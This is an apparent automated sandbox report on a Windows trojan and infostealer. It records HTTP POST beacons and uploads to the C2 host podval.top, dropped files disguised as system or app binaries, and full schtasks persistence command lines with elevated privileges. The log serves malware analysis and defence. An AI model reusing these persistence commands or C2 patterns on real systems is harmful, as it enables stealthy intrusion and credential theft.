Source: global traffic | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 1772 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 1048 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: podval.top | Content-Length: 174868 | Expect: 100-continue
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: podval.top
Source: unknown | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: upfc.exe, 00000011.00000002.2485222023.000000000368E000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003348000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.000000000378E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://podval.top
Source: upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://podval.top/
Source: upfc.exe, 00000011.00000002.2485222023.000000000368E000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003348000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.000000000378E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://podval.top/LineToPythonJsLowupdateLongpollWindowsFlower.php
Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.00000000030A6000.00000004.00000800.00020000.00000000.sdmp, 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWindow created: window name: CLIPBRDWNDCLASS
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe\:Zone.Identifier:$DATA
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\b83e72d5c7bd2d
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMP
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMP
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AHphtSeX.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000000.1240865306.0000000000586000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1312234692.000000001B8FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000026.00000002.1429420020.00000000032B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000027.00000002.1441556260.00000000029DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000027.00000002.1441556260.00000000029D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000027.00000002.1441556260.0000000002A8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: StartMenuExperienceHost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: llflCdrMcgGB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: upfc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: upfc.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, wdL8CMv6YqRVim2kl7S.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@42/58@1/1
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Program Files\7-Zip\Lang\upfc.exe
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Users\user\Desktop\YPnuykix.log
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3812:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-KBzVK5gMd7NT4ldKjHn2
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile created: C:\Users\user\AppData\Local\Temp\pb5w2chy
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat"
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile read: C:\Users\desktop.ini
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: GuaAEdheNO.17.dr, XRbfGtKxff.17.dr, FPVtplfwjV.17.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeReversingLabs: Detection: 72%
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile read: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD41E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC76655AD3B5B14A58A99CB3ECAE1D1A90.TMP"
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD631.tmp" "c:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMP"
                              Source: unknownProcess created: C:\Program Files (x86)\Java\jre-1.8\upfc.exe "C:\Program Files (x86)\java\jre-1.8\upfc.exe"
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 8 /tr "'C:\Recovery\llflCdrMcgGB.exe'" /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "llflCdrMcgGB" /sc ONLOGON /tr "'C:\Recovery\llflCdrMcgGB.exe'" /rl HIGHEST /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 14 /tr "'C:\Recovery\llflCdrMcgGB.exe'" /rl HIGHEST /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 6 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "llflCdrMcgGB" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /rl HIGHEST /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 8 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /rl HIGHEST /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /rl HIGHEST /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab6" /sc MINUTE /mo 9 /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /f
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab" /sc ONLOGON /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: unknownProcess created: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                              Source: unknownProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                              Source: unknownProcess created: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeProcess created: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: appresolver.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: bcp47langs.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: slc.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: sppc.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Section loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: apphelp.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: version.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: wldp.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: profapi.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: ktmw32.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: rasapi32.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: rasman.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: rtutils.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: mswsock.dll
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Section loaded: winhttp.dll
